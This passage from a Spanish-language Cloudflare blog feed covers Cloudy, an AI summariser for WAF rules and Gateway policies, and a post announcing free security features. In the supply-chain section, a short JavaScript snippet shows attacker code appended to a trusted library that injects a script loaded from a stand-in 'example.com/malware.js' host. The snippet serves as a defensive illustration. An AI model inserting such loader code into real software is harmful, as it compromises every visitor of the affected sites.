          </figure><p>Con la tecnología de <a href="https://developers.cloudflare.com/workers-ai/"><u>Workers AI</u></a>, hoy compartiremos cómo Cloudy te ayudará a revisar tus reglas personalizadas del WAF y te proporcionaremos un resumen de lo que está configurado en ellas. Cloudy también te ayudará a identificar y resolver problemas tales como:</p><ul><li><p><b>Identificar reglas redundantes</b>: identifica cuándo varias reglas realizan la misma función, o utilizan campos similares, ayudándote a optimizar tu configuración.</p></li><li><p><b>Optimización del orden de ejecución</b>: detecta los casos en los que el orden de las reglas afecta a la funcionalidad, como cuando una regla de terminación (acción de bloqueo/desafío) impide la ejecución de reglas posteriores.</p></li><li><p><b>Análisis de reglas en conflicto</b>: detecta cuándo las reglas se contrarrestan entre sí, como cuando una regla bloquea el tráfico que otra regla está diseñada para permitir o registrar.</p></li><li><p><b>Identificar reglas desactivas</b>: destaca las reglas de seguridad potencialmente importantes que tienen un estado desactivado, lo que ayuda a garantizar que las protecciones críticas no han quedado accidentalmente inactivas.</p></li></ul><p>Cloudy no solo resumirá tus reglas. También analizará las relaciones e interacciones entre las reglas para proporcionar recomendaciones prácticas. Para los equipos de seguridad que gestionan conjuntos complejos de reglas personalizadas, esto significa dedicar menos tiempo a auditar las configuraciones y más confianza en la cobertura de seguridad.</p><p>Disponibles para todos los usuarios, nos complace mostrar cómo los agentes de IA de Cloudflare pueden mejorar la facilidad de uso de nuestros productos, empezando por las reglas personalizadas del WAF. Pero esto es solo el principio.</p>
    <div>
      <h3>Políticas de Cloudflare One Firewall</h3>
      <a href="#politicas-de-cloudflare-one-firewall">
        
      </a>
    </div>
    
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4CXHQVlO3GGqwp6DGyOklJ/3068c434c4a303cf22c328c302947fcb/BLOG-2692_3.png" />
          </figure><p>También hemos añadido Cloudy a <a href="https://www.cloudflare.com/static/e9ea5dfaa69c554cc1cbaa7f3e441acf/Cloudflare_One_at_a_glance.pdf"><u>Cloudflare One</u></a>, nuestra plataforma SASE, donde las empresas gestionan la seguridad de sus empleados y herramientas desde un único panel de control.</p><p>En <a href="https://www.cloudflare.com/zero-trust/products/gateway/"><u>Cloudflare Gateway</u></a>, nuestra solución de puerta de enlace web segura, los clientes pueden configurar políticas para gestionar cómo los empleados hacen su trabajo en Internet. Estas políticas de Gateway pueden bloquear el acceso a sitios maliciosos, evitar violaciones de pérdida de datos y controlar el acceso de los usuarios, entre otras cosas.</p><p>Pero al igual que las reglas personalizadas del WAF, las configuraciones de las políticas de Gateway pueden complicarse en exceso y atascarse con el tiempo, con antiguas políticas olvidadas que hacen quién sabe qué. Selectores y operadores con funcionamientos contradictorios entre ellos. Algunos bloquean el tráfico, otros lo permiten. Políticas que incluyen varios grupos de usuarios, pero excluyen a empleados específicos. Incluso hemos visto políticas que bloquean cientos de URL en un solo paso. En resumen, la gestión de años de políticas de Gateway puede resultar abrumadora.</p><p>Entonces, ¿por qué no hacer que Cloudy resuma las políticas de Gateway de manera que su propósito sea claro y conciso?</p><p>Disponible para todos los usuarios de Cloudflare Gateway (crea una cuenta gratuita de Cloudflare One <a href="https://www.cloudflare.com/zero-trust/products/"><u>aquí</u></a>), ahora Cloudy proporcionará un breve resumen de cualquier política de Gateway que consultes. Ahora es más fácil que nunca comprender claramente cada política de un vistazo, lo que permite a los administradores detectar configuraciones erróneas, controles redundantes u otras áreas de mejora, y avanzar con confianza.</p>
    <div>
      <h3>Basado en Workers AI</h3>
      <a href="#basado-en-workers-ai">
        
      </a>
    </div>
    <p>La clave de nuestra nueva funcionalidad es <a href="https://developers.cloudflare.com/workers-ai/"><u>Cloudflare Workers AI</u></a> (sí, ¡la misma versión que utiliza todo el mundo!) que aprovecha los modelos avanzados de lenguaje de gran tamaño (LLM) para procesar grandes cantidades de información; en este caso, datos de políticas y reglas. Tradicionalmente, revisar y contextualizar manualmente configuraciones complejas es una tarea abrumadora para cualquier equipo de seguridad. Con Workers AI, automatizamos ese proceso, convirtiendo los datos de configuración sin procesar en resúmenes claros y coherentes y en recomendaciones prácticas.</p>
    <div>
      <h4><b>Cómo funciona</b></h4>
      <a href="#como-funciona">
        
      </a>
    </div>
    <p>Cloudflare Workers AI ingiere las configuraciones de políticas y de reglas de tu configuración de Cloudflare y las combina con una instrucción de LLM específicamente diseñada. Utilizamos los mismos <a href="https://developers.cloudflare.com/workers-ai/models/"><u>modelos LLM disponibles públicamente</u></a> que ofrecemos a nuestros clientes, y luego enriquecemos la instrucción con datos adicionales para darle el contexto. Para esta tarea específica de analizar y resumir los datos de políticas y de reglas, proporcionamos al LLM:</p><ul><li><p><b>Datos de políticas y reglas</b>: son los propios datos primarios, incluida la configuración actual de las políticas/reglas que queremos que Cloudy resuma y para las que queremos que nos ofrezca sugerencias.</p></li><li><p><b>Documentación sobre las capacidades del producto:</b> proporcionamos al modelo detalles técnicos adicionales sobre las configuraciones de políticas y de reglas que son posibles con cada producto, para que el modelo sepa qué tipo de recomendaciones están dentro de sus límites.</p></li><li><p><b>Conjuntos de datos enriquecidos</b>: cuando las reglas personalizadas del WAF o las políticas de Gateway de Cloudflare One aprovechan otras "listas" (p. ej., una regla del WAF que hace referencia a varios países, una política de Gateway que aprovecha una categoría de contenido específica), los elementos de la lista seleccionados deben convertirse primero de un ID a una redacción de texto sin formato para que el LLM pueda interpretar qué valores de política/regla se están utilizando realmente.</p></li><li><p><b>Instrucciones de salida</b>: especificamos al modelo en qué formato nos gustaría recibir la salida. En este caso, utilizamos JSON para facilitar el manejo.</p></li><li><p><b>Aclaraciones adicionales</b>: por último, indicamos explícitamente al LLM que esté seguro de su resultado, priorizando ese aspecto sobre cualquier otro. Esto nos ayuda a garantizar que ninguna alucinación llegue al resultado final.</p></li></ul><p>Al automatizar el análisis de tus reglas personalizadas del WAF y tus políticas de Gateway, Cloudflare Workers AI no solo te ahorra tiempo, sino que también mejora la seguridad al reducir el riesgo de error humano. Obtienes información clara y práctica que te permite optimizar tus configuraciones, detectar rápidamente las anomalías y mantener una postura de seguridad eficaz, todo ello sin necesidad de revisiones manuales que requieran mucho trabajo.</p>
    <div>
      <h4>¿Cuál será el próximo avance de Cloudy?</h4>
      <a href="#cual-sera-el-proximo-avance-de-cloudy">
        
      </a>
    </div>
    <p>Ya están disponibles las vistas previas beta de Cloudy para todos los clientes de Cloudflare. Pero esto es solo el principio de lo que prevemos para la funcionalidad basada en la IA en todo nuestro conjunto de productos.</p><p>Durante lo que queda de 2025, tenemos previsto implementar funciones adicionales de agentes de IA en otras áreas de Cloudflare. Estas nuevas funciones no solo ayudarán a los clientes a gestionar la seguridad de forma más eficiente, sino que también proporcionarán recomendaciones inteligentes para optimizar el rendimiento, agilizar las operaciones y mejorar la experiencia del usuario.</p><p>Cuando conozcas Cloudy y pruebes estas nuevas funciones de IA, nos encantaría conocer tu opinión. Envíanos tus comentarios a <a href="#"><u>cloudyfeedback@cloudflare.com</u></a>, o publica tus opiniones en X, LinkedIn o Mastodon con la etiqueta #SecurityWeek. Tus comentarios nos ayudarán a definir nuestra hoja de ruta para mejorar la IA, y a ofrecer a nuestros usuarios herramientas más inteligentes y eficientes que nos ayuden a todos a mejorar la seguridad.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5gGseiyO6pbddpdSVQ5wfJ/ae1d0d5a2f8ec01f571de7a85b655370/BLOG-2692_4.png" />
          </figure>
    <div>
      <h3>Ver en Cloudflare TV</h3>
      <a href="#ver-en-cloudflare-tv">
        
      </a>
    </div>
    <div>
  
</div><p></p> ]]></content:encoded>
            <category><![CDATA[Workers AI]]></category>
            <category><![CDATA[Cloudflare Workers]]></category>
            <category><![CDATA[Plataforma para desarrolladores]]></category>
            <category><![CDATA[Desarrolladores]]></category>
            <category><![CDATA[LLM]]></category>
            <category><![CDATA[WAF]]></category>
            <category><![CDATA[Cloudflare One]]></category>
            <category><![CDATA[Zero Trust]]></category>
            <category><![CDATA[Cloudflare Zero Trust]]></category>
            <category><![CDATA[SASE]]></category>
            <category><![CDATA[Puerta de enlace web segura]]></category>
            <category><![CDATA[Beta]]></category>
            <category><![CDATA[Servicios de red]]></category>
            <guid isPermaLink="false">7ywSxti5U7fxjKbqmVXpGW</guid>
            <dc:creator>Alex Dunbrack</dc:creator>
            <dc:creator>Harsh Saxena</dc:creator>
        </item>
        <item>
            <title><![CDATA[Mayor seguridad en Internet con Cloudflare: información sobre amenazas, análisis y nuevas detecciones de amenazas, sin coste]]></title>
            <link>https://blog.cloudflare.com/es-es/a-safer-internet-with-cloudflare/</link>
            <pubDate>Tue, 24 Sep 2024 13:00:00 GMT</pubDate>
            <description><![CDATA[ Hoy estamos haciendo grandes avances en nuestra misión de ayudar a mejorar Internet. Cloudflare ofrece a todo el mundo acceso gratuito a más de 10 productos y funciones diferentes de seguridad de sitios web y redes. ]]></description>
            <content:encoded><![CDATA[ <p>Es probable que cualquier persona que utilice Internet tenga contacto a diario con la red de Cloudflare, ya sea accediendo a un sitio protegido por Cloudflare, utilizando nuestro <a href="https://1.1.1.1/dns"><u>solucionador 1.1.1.1</u></a> o conectándose a través de una red utilizando nuestros productos Cloudflare One.</p><p>Esto coloca a Cloudflare en una posición de gran responsabilidad para mejorar la seguridad de Internet para miles de millones de usuarios en todo el mundo. Hoy proporcionamos información sobre amenazas y más de 10 nuevas funciones de seguridad de forma gratuita a todos nuestros clientes. Tanto si utilizas Cloudflare para proteger tu sitio web, tu red doméstica o tu oficina, encontrarás algo útil que puedes empezar a utilizar con solo unos clics.</p><p>Estas funciones se centran en algunas de las mayores preocupaciones en materia de ciberseguridad, como los <a href="https://www.cloudflare.com/zero-trust/solutions/account-takeover-prevention/"><u>ataques de apropiación de cuentas</u></a>, los <a href="https://blog.cloudflare.com/tag/supply-chain-attacks/"><u>ataques a la cadena de suministro</u></a>, los <a href="https://www.cloudflare.com/learning/security/api/what-is-api-security/"><u>ataques contra puntos finales de la API</u></a>, la <a href="https://www.cloudflare.com/network-services/products/magic-network-monitoring/"><u>visibilidad de la red</u></a> y las <a href="https://www.cloudflare.com/learning/access-management/what-is-dlp/"><u>fugas de datos de tu red</u></a>.</p>
    <div>
      <h2>Más seguridad para todos</h2>
      <a href="#mas-seguridad-para-todos">
        
      </a>
    </div>
    <p>Puedes leer más sobre cada una de estas funciones en las secciones siguientes, pero queríamos adelantarte un breve resumen.</p><p><b>Si eres un entusiasta de la ciberseguridad</b>: puedes visitar nuestro <a href="http://cloudflare.com/threat-intelligence/"><u>nuevo sitio web de información sobre amenazas de Cloudforce One</u></a> para saber más sobre ciberamenazas, campañas de ataque y otros problemas relacionados con la seguridad en Internet.</p><p><b>Si eres propietario de un sitio web</b>: a partir de hoy, todos los planes gratuitos tendrán acceso a <a href="https://developers.cloudflare.com/waf/analytics/security-analytics/"><u>Análisis de seguridad</u></a> para sus zonas. Además, también <a href="https://developers.cloudflare.com/dns/additional-options/analytics/"><u>Análisis de DNS</u></a> estará disponible a través de GraphQL.</p><p>Una vez que tienes visibilidad, se trata de distinguir el tráfico legítimo del tráfico malicioso. Todos los clientes pueden acceder a los servicios siempre activos de <a href="https://developers.cloudflare.com/waf/managed-rules/check-for-exposed-credentials/"><u>detección de ataques de apropiación de cuentas</u></a>, la <a href="https://developers.cloudflare.com/api-shield/security/schema-validation/"><u>validación de esquemas de las API</u></a> para aplicar un modelo de seguridad positivo en sus puntos finales de la API, y el <a href="https://developers.cloudflare.com/page-shield/detection/monitor-connections-scripts/"><u>supervisor de scripts de Page Shield</u></a> para proporcionar visibilidad de los activos de terceros que cargas desde tu lado y que podrían utilizarse para realizar ataques a la cadena de suministro.</p><p><b>Si utilizas Cloudflare para proteger a tus usuarios y tu red</b>: vamos a agrupar varios de nuestros productos Cloudflare One en una nueva solución gratuita. Este paquete incluirá los <a href="https://www.cloudflare.com/plans/zero-trust-services/"><u>productos Zero Trust actuales que ofrecemos de forma gratuita</u></a> y nuevos productos como <a href="https://www.cloudflare.com/network-services/products/magic-network-monitoring/"><u>Magic Network Monitoring</u></a> para la visibilidad de la red, <a href="https://www.cloudflare.com/learning/access-management/what-is-dlp/"><u>Prevención de pérdida de datos</u></a> para los datos confidenciales y <a href="https://www.cloudflare.com/learning/performance/what-is-digital-experience-monitoring/"><u>Digital Experience Monitoring</u></a> para medir la conectividad y el rendimiento de la red. Cloudflare es el único proveedor que ofrece versiones gratuitas de este tipo de productos.</p><p><b>Si eres un usuario nuevo</b>: tenemos nuevas opciones de autenticación. A partir de hoy, presentamos la opción de utilizar la autenticación de Google para registrarse e iniciar sesión en Cloudflare, lo que facilitará el inicio de sesión para algunos de nuestros clientes y reducirá la dependencia de tener que recordar contraseñas, reduciendo así el riesgo de que su cuenta de Cloudflare se vea comprometida.</p><p>Y ahora con más detalle:</p>
    <div>
      <h2>Información sobre amenazas y análisis</h2>
      <a href="#informacion-sobre-amenazas-y-analisis">
        
      </a>
    </div>
    
    <div>
      <h3>Cloudforce One</h3>
      <a href="#cloudforce-one">
        
      </a>
    </div>
    <p>Nuestro equipo de operaciones e investigación de amenazas, <a href="https://blog.cloudflare.com/es-es/introducing-cloudforce-one-threat-operations-and-threat-research/"><u>Cloudforce One</u></a>, se complace en anunciar el lanzamiento de un <a href="http://cloudflare.com/threat-intelligence/"><u>sitio web dedicado a la información sobre amenazas y de acceso gratuito</u></a>. Utilizaremos este sitio para publicar información técnica y ejecutiva sobre las últimas amenazas y tácticas de los ciberdelincuentes, así como información sobre malware, vulnerabilidades y ataques emergentes.</p><p>También publicamos dos nuevos elementos de datos en la información sobre amenazas, y prometemos más. Visita el <a href="http://cloudflare.com/threat-intelligence/"><u>nuevo sitio web</u></a> aquí para ver las últimas investigaciones, que incluyen un actor persistente alineado con el estado que ataca a organizaciones regionales en el sur y este de Asia, así como el aumento del fraude de transporte de doble intermediación. </p><p><a href="http://cloudflare.com/threat-intelligence/"><u>Suscríbete</u></a> para recibir notificaciones por correo electrónico sobre futuras investigaciones sobre amenazas.</p>
    <div>
      <h3>Análisis de seguridad</h3>
      <a href="#analisis-de-seguridad">
        
      </a>
    </div>
    <p>Análisis de seguridad te ofrece una perspectiva de la seguridad de <b>todo</b> tu tráfico HTTP, no solo de las solicitudes mitigadas, lo que te permite centrarte en lo más importante: el tráfico que se considera malicioso pero que potencialmente no se ha mitigado. Esto significa que, además de utilizar los Eventos de seguridad para ver las medidas de seguridad adoptadas por nuestro conjunto de productos de seguridad para las aplicaciones, puedes utilizar Análisis de seguridad para revisar todo tu tráfico en busca de anomalías o comportamientos extraños y, a continuación, utilizar la información obtenida para elaborar reglas de mitigación precisas. en función de tus patrones de tráfico específicos. A partir de hoy, ponemos esta perspectiva a disposición de los clientes en todos nuestros planes. 

Los usuarios de los planes gratuito y Pro ahora tendrán acceso a <a href="https://dash.cloudflare.com/?to=/:account/:zone/security/analytics"><u>un nuevo panel de control</u></a> de Análisis de seguridad, donde tendrás una visión general de tu tráfico en el gráfico de análisis de tráfico, y podrás agrupar y filtrar para concentrarte fácilmente en las anomalías. También puedes ver las principales estadísticas y filtrar por diversas dimensiones, como países, navegadores de origen, sistemas operativos de origen, versiones HTTP, versión del protocolo SSL, estado de la caché y acciones de seguridad.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/7oBM7D78NDErNNgIPRSJN9/055440bfd256bb2f128d5d99858a5748/image6.jpg" />
          </figure>
    <div>
      <h3>Análisis de DNS</h3>
      <a href="#analisis-de-dns">
        
      </a>
    </div>
    <p>Todos los usuarios de Cloudflare ahora tienen acceso al <a href="https://dash.cloudflare.com/?to=/:account/:zone/dns/analytics"><u>nuevo y mejorado panel de control de Análisis de DNS</u></a>, así como al nuevo conjunto de datos de Análisis de DNS en nuestra <a href="https://developers.cloudflare.com/analytics/graphql-api/"><u>eficaz API GraphQL</u></a>. Ahora puedes analizar fácilmente las consultas DNS enviadas a tus dominios, lo que te puede ayudar a solucionar problemas, detectar patrones y tendencias, o generar informes de uso aplicando filtros eficaces y desglosando las consultas DNS por origen.

Con el <a href="https://blog.cloudflare.com/es-es/foundation-dns-launch"><u>lanzamiento de Foundation DNS</u></a>, presentamos una nueva función Análisis de DNS basados en GraphQL. Anteriormente estos análisis solo estaban disponibles para las zonas que utilizaban <a href="https://developers.cloudflare.com/dns/foundation-dns/advanced-nameservers/"><u>servidores de nombres avanzados</u></a>. Sin embargo, debido a la información detallada que proporcionan estos análisis, consideramos que esta función era algo que debíamos poner a disposición de todos los usuarios. A partir de hoy, se puede acceder a la nueva función Análisis de DNS basados en GraphQL en todas las zonas que utilicen el servicio de DNS autoritativo de Cloudflare en Análisis en la sección DNS.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3LJ4aIFB4pHhHtWeWzYlgV/96c701d7c826a92e1220c7cd85f40f88/image5.png" />
          </figure>
    <div>
      <h2>Detección y mitigación de amenazas a las aplicaciones</h2>
      <a href="#deteccion-y-mitigacion-de-amenazas-a-las-aplicaciones">
        
      </a>
    </div>
    
    <div>
      <h3>Detección de la apropiación de cuentas</h3>
      <a href="#deteccion-de-la-apropiacion-de-cuentas">
        
      </a>
    </div>
    <p><a href="https://techreport.com/statistics/cybersecurity/password-reuse-statistics/"><u>El 65 % de los usuarios de Internet</u></a> son vulnerables a la apropiación de cuentas debido a la reutilización de contraseñas y a la creciente frecuencia de grandes fugas de datos. Ayudar a mejorar Internet implica hacer que la protección de cuentas críticas sea fácil y accesible para todos los usuarios.</p><p>A partir de hoy, proporcionamos una sólida seguridad para las cuentas que ayuda a prevenir el relleno de credenciales y otros ataques de apropiación de cuentas, a todo el mundo de forma gratuita, ya sean usuarios individuales o grandes empresas, ofreciendo gratis funciones mejoradas como las comprobaciones de credenciales filtradas y las detecciones de apropiación de cuentas. </p><p>Estas actualizaciones incluyen la detección automática de inicios de sesión y la prevención de intentos de descifrar una contraseña por fuerza bruta con una configuración mínima, así como el acceso a una base de datos integral de credenciales filtradas de más de 15 000 millones de contraseñas que contendrá las contraseñas filtradas del servicio <a href="https://haveibeenpwned.com/"><u>Have I been Pwned (HIBP)</u></a> además de nuestra propia base de datos. Los clientes pueden tomar medidas respecto a las solicitudes de credenciales filtradas mediante las funciones que ofrece el WAF de Cloudflare, como las <a href="https://developers.cloudflare.com/waf/rate-limiting-rules"><u>reglas de limitación de velocidad</u></a> y las <a href="https://developers.cloudflare.com/waf/custom-rules/"><u>reglas personalizadas</u></a>, o pueden tomar medidas sobre el origen aplicando <a href="https://www.cloudflare.com/learning/access-management/what-is-multi-factor-authentication/"><u>la autenticación en varias fases</u></a> o solicitando un restablecimiento de contraseña basado en un encabezado enviado al origen.</p><p>La configuración es sencilla: los usuarios del plan gratuito obtienen detecciones automáticas, mientras que los usuarios de pago pueden activar las nuevas funciones con un solo clic en el panel de control de Cloudflare. Para obtener más información sobre la instalación y la configuración, consulta nuestra <a href="https://developers.cloudflare.com/waf/detections/leaked-credentials/"><u>documentación</u></a> y utilízala hoy mismo.</p>
    <div>
      <h3>Validación de esquemas de las API</h3>
      <a href="#validacion-de-esquemas-de-las-api">
        
      </a>
    </div>
    <p>El tráfico de API <a href="https://www.cloudflare.com/2024-api-security-management-report/"><u>comprende más de la mitad</u></a> del tráfico dinámico en la red de Cloudflare. La popularidad de las API ha abierto un nuevo <a href="https://cyware.com/news/unprotected-database-belonging-to-justdial-exposes-personal-information-of-almost-100-million-users-1d5bb7a9"><u>conjunto</u></a> de <a href="https://venturebeat.com/security/t-mobile-data-breach-shows-api-security-cant-be-ignored/"><u>vectores de</u></a> <a href="https://venturebeat.com/security/twitter-breach-api-attack/"><u>ataque</u></a>. La <a href="https://developers.cloudflare.com/api-shield/security/schema-validation/"><u>validación de esquemas</u></a> de Cloudflare API Shield es el primer paso para <a href="https://blog.cloudflare.com/es-es/api-gateway/"><u>reforzar</u></a> la seguridad de tus API frente a estas nuevas amenazas. </p><p>Ahora, por primera vez, <i>cualquier</i> cliente de Cloudflare puede utilizar la validación de esquemas para garantizar que solo las solicitudes válidas enviadas a su API lleguen a su origen.</p><p>Esta funcionalidad impide la divulgación accidental de información debido a errores, evita que los desarrolladores expongan al azar puntos finales a través de un proceso no estándar y bloquea automáticamente las API zombies, ya que tu inventario de API se mantiene actualizado como parte de tu proceso de CI/CD.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3PMaRYLTwff6D7sdXRysJ7/728deb51cbec996c6741c428639b6900/image2.png" />
          </figure><p>Te sugerimos que utilices la <a href="https://developers.cloudflare.com/api/operations/api-shield-schema-validation-post-schema"><u>API</u></a> o el proveedor <a href="https://developers.cloudflare.com/api-shield/reference/terraform/"><u>Terraform</u></a> de Cloudflare para añadir puntos finales a Cloudflare API Shield y actualizar el esquema después de que se haya publicado tu código como parte de tu proceso de CI/CD posterior a la compilación. De esta forma, API Shield se convierte en una herramienta de inventario de API de referencia, y la <a href="https://developers.cloudflare.com/api-shield/security/schema-validation/"><u>validación de esquemas</u></a> se encargará de las solicitudes enviadas a tu API que no esperas.</p><p>Aunque las API tienen que ver con la integración con terceros, a veces las integraciones se realizan cargando bibliotecas directamente en tu aplicación. A continuación, ayudamos a mejorar la seguridad de la web protegiendo a los usuarios contra scripts maliciosos de terceros que roben información confidencial de las entradas en tus páginas.</p>
    <div>
      <h3>Prevención de ataques a la cadena de suministro</h3>
      <a href="#prevencion-de-ataques-a-la-cadena-de-suministro">
        
      </a>
    </div>
    <p>Las aplicaciones web modernas mejoran las experiencias de sus usuarios y reducen el tiempo de desarrollo mediante el uso de bibliotecas JavaScript de terceros. Debido a su nivel de acceso privilegiado a todo el contenido de la página, una biblioteca JavaScript de terceros en riesgo puede exfiltrar subrepticiamente información confidencial a un atacante sin que el usuario final o el administrador del sitio sea consciente de ello.</p><p>Para contrarrestar esta amenaza, lanzamos Page Shield <a href="https://blog.cloudflare.com/es-es/introducing-page-shield/"><u>hace tres años</u></a>. Ahora lanzamos Script Monitor de Page Shield de forma gratuita para todos nuestros usuarios.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5b6sxHcCLgIAHfb6Qub6NR/ae2f22ed1d2126804a5bc6e333d64fed/image3.png" />
          </figure><p>Con <a href="https://dash.cloudflare.com/?to=/:account/:zone/security/page-shield"><u>Script Monitor</u></a>, verás <i>todos</i> los activos de JavaScript cargados en la página, no solo los que incluyeron tus desarrolladores. ¡Esta visibilidad incluye scripts cargados dinámicamente por otros scripts! Una vez que un atacante ha puesto en riesgo la biblioteca, es muy fácil añadir un nuevo script malicioso sin cambiar el contexto del HTML original y, en su lugar, incluir un nuevo código en el activo JavaScript existente incluido:</p>
            <pre><code>// Original library code (trusted)
function someLibraryFunction() {
    // useful functionality here
}

// Malicious code added by the attacker
let malScript = document.createElement('script');
malScript.src = 'https://example.com/malware.js';
document.body.appendChild(malScript);</code></pre>
            <p>Script Monitor fue esencial cuando se conoció la <a href="https://blog.cloudflare.com/polyfill-io-now-available-on-cdnjs-reduce-your-supply-chain-risk"><u>noticia del cambio de propiedad de la biblioteca pollyfill.io</u></a>. Los usuarios de Script Monitor tenían visibilidad inmediata de los scripts cargados en sus sitios y podían saber rápida y fácilmente si estaban en riesgo.</p><p>Estamos encantados de ampliar la visibilidad de estos scripts a la mayor parte de la web posible con el lanzamiento de Script Monitor para todos los clientes. Descubre cómo puedes empezar <a href="https://developers.cloudflare.com/page-shield/detection/monitor-connections-scripts/"><u>aquí en la documentación</u></a>.</p><p>Los usuarios existentes de Page Shield pueden filtrar inmediatamente los datos supervisados, sabiendo si su aplicación utiliza polyfill.io (o cualquier otra biblioteca). Además, <a href="https://blog.cloudflare.com/automatically-replacing-polyfill-io-links-with-cloudflares-mirror-for-a-safer-internet/"><u>desarrollamos una reescritura de polyfill.io</u></a> en respuesta al servicio en riesgo, que se activó automáticamente para los planes gratuitos en junio de 2024.</p>
    <div>
      <h3>Turnstile como extensión de Google Firebase </h3>
      <a href="#turnstile-como-extension-de-google-firebase">
        
      </a>
    </div>
    <p>Nos complace anunciar el <a href="https://developers.cloudflare.com/turnstile/extensions/google-firebase/"><u>proveedor de comprobación de aplicaciones Cloudflare Turnstile para Google Firebase</u></a>, que ofrece una eficaz integración sin necesidad de configuración manual. Con esta nueva extensión, los desarrolladores pueden crear aplicaciones móviles o web en Firebase para proteger sus proyectos contra los bots utilizando la alternativa de Cloudflare a CAPTCHA. Al aprovechar las capacidades de detección y desafío de bot de Turnstile, puedes garantizar que solo los visitantes que sean usuarios humanos auténticos interactúen con tus servicios de backend de Firebase, lo que mejora tanto la seguridad como la experiencia del usuario. Cloudflare Turnstile, una alternativa a CAPTCHA centrada en la privacidad, distingue entre usuarios humanos y bots sin perturbar la experiencia del usuario. A diferencia de las soluciones CAPTCHA tradicionales, que los usuarios suelen abandonar, Turnstile funciona de forma invisible y ofrece varios modos para garantizar interacciones fluidas con los usuarios.</p><p>La extensión de comprobación de aplicaciones de Firebase para Turnstile se integra fácilmente, lo que permite a los desarrolladores mejorar rápidamente la seguridad de las aplicaciones con una configuración mínima. Esta extensión también es gratuita con uso ilimitado con el nivel gratuito de Turnstile. Al combinar las ventajas de los servicios de backend de Google Firebase y Cloudflare Turnstile, los desarrolladores pueden ofrecer una experiencia segura y eficaz a sus usuarios. </p>
    <div>
      <h2>Cloudflare One</h2>
      <a href="#cloudflare-one">
        
      </a>
    </div>
    <p><a href="https://www.cloudflare.com/zero-trust/"><u>Cloudflare One</u></a> es una plataforma integral de <a href="https://www.cloudflare.com/learning/access-management/what-is-sase/"><u>perímetro de servicio de acceso seguro (SASE)</u></a> diseñada para proteger y conectar usuarios, aplicaciones, dispositivos y redes a través de Internet. Combina servicios como el acceso a la red Zero Trust (ZTNA), la puerta de enlace web segura (SWG) y muchos más en una única solución. Cloudflare One puede ayudar a todos a proteger a las personas y las redes, gestionar el control de acceso, proteger contra las ciberamenazas, salvaguardar sus datos y mejorar el rendimiento del tráfico de red direccionándolo a través de la red global de Cloudflare. Sustituye las medidas de seguridad tradicionales ofreciendo un enfoque basado en la nube para proteger y agilizar el acceso a los recursos corporativos.</p><p>Ahora todo el mundo tiene acceso gratuito a cuatro nuevos productos que se han añadido a Cloudflare One en los últimos dos años:</p><ul><li><p><i></i><a href="https://www.cloudflare.com/learning/access-management/what-is-a-casb/"><u>Agente de seguridad de acceso a la nube (CASB)</u></a> para mitigar el riesgo de las aplicaciones SaaS<i>.</i></p></li><li><p><i></i><a href="https://www.cloudflare.com/learning/access-management/what-is-dlp/"><u>Prevención de pérdida de datos (DLP)</u></a> para evitar que los datos confidenciales salgan de tu red y de tus aplicaciones SaaS<i>.</i></p></li><li><p><a href="https://www.cloudflare.com/learning/performance/what-is-digital-experience-monitoring/"><u>Digital Experience Monitoring</u></a> para ver la experiencia de un usuario cuando está en cualquier red.</p></li><li><p><i></i><a href="https://www.cloudflare.com/network-services/products/magic-network-monitoring/"><u>Magic Network Monitoring</u></a> para ver todo el tráfico que circula a través de tu red<i>.</i></p></li></ul><p>Esto se suma a los productos de seguridad de red existentes en la plataforma Cloudflare One:</p><ul><li><p><a href="https://www.cloudflare.com/learning/access-management/what-is-ztna/"><u>Access</u></a> para verificar la identidad de los usuarios y permitirles solo utilizar las aplicaciones que deben utilizar.</p></li><li><p><a href="https://www.cloudflare.com/learning/access-management/what-is-a-secure-web-gateway/"><u>Gateway</u></a> para proteger el tráfico de red tanto de salida a la red pública como de entrada a tu red privada.</p></li><li><p><a href="https://developers.cloudflare.com/cloudflare-one/connections/connect-networks/"><u>Cloudflare Tunnel</u></a>, nuestros conectores de aplicaciones, que incluyen tanto cloudflared como WARP Connector, para conectar diferentes aplicaciones, servidores y redes privadas a la red de Cloudflare.</p></li><li><p><a href="https://developers.cloudflare.com/cloudflare-one/connections/connect-devices/warp/"><u>Cloudflare WARP</u></a>, nuestro agente de dispositivos, para enviar el tráfico de forma segura desde un portátil o dispositivo móvil a Internet.</p></li></ul><p>Cualquier persona con una cuenta de Cloudflare recibirá automáticamente 50 usuarios gratuitos en todos estos productos en su organización Cloudflare One. Visita nuestra <a href="https://www.cloudflare.com/plans/zero-trust-services/"><u>página de los planes Zero Trust y SASE</u></a> para obtener más información sobre nuestros productos gratuitos y para conocer nuestros planes de pago por uso y de contrato para equipos de más de 50 miembros.</p>
    <div>
      <h2>Autenticación con Google</h2>
      <a href="#autenticacion-con-google">
        
      </a>
    </div>
    <p>El propio panel de control de Cloudflare se ha convertido en un recurso vital que es necesario proteger, y dedicamos mucho tiempo a garantizar que las cuentas de usuario de Cloudflare no se vean comprometidas.</p><p>Para ello, hemos aumentado la seguridad añadiendo métodos de autenticación adicionales, como la autenticación en dos fases (2FA) basada en aplicaciones, las claves de acceso, el inicio de sesión único (SSO) y el inicio de sesión con Apple. Hoy añadimos la posibilidad de registrarse e iniciar sesión con una cuenta de Google. </p><p>Cloudflare admite varios flujos de trabajo de autenticación adaptados a distintos casos de uso. Aunque el inicio de sesión único y las claves de acceso son los métodos de autenticación preferidos y más seguros, creemos que proporcionar factores de autenticación más estrictos que las contraseñas llenará un vacío y aumentará la seguridad media general para nuestros usuarios. Iniciar sesión con Google facilita la vida de nuestros usuarios y evita que tengan que recordar otra contraseña cuando ya están navegando por la web con una identidad de Google.</p><p>El inicio de sesión con Google se basa en la especificación <a href="https://oauth.net/2/"><u>OAuth 2.0</u></a>, y permite a Google compartir de forma segura información de identificación sobre una identidad determinada, al mismo tiempo que garantiza que es Google quien proporciona esta información, evitando cualquier potencial suplantación de Google por parte de entidades maliciosas.</p><p>Esto significa que podemos delegar la autenticación a Google, evitando ataques de conocimiento cero directamente en esta identidad de Cloudflare.</p><p>Al llegar a la página de inicio de sesión de Cloudflare, verás el siguiente botón. 